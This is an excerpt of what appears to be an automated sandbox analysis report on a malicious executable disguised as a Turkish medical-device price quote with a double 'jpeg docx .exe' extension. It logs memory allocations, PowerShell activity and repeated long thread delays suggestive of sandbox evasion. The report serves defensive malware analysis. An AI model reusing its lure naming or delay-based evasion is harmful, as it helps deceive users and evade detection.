                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 1250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 8F50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 9F50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: A160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: B160000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239875Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239766Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239657Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239532Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239407Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239292Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239188Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 239063Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238938Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238813Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238688Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238578Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238469Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238219Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 238083Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 237956Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599828Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599719Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 599110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595488Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594494Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594282Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594157Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 594032Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeThread delayed: delay time: 593594Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 791Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 2358Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7903Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1832Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 2251Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: threadDelayed 7567Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow / User API: foregroundWindowGot 1747Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239657s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239407s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239292s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -239063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -238083s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7684Thread sleep time: -237956s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 7632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8180Thread sleep count: 2251 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8180Thread sleep count: 7567 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep count: 34 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe TID: 8176Thread sleep time: -599360s >= -30000sJump to behavior
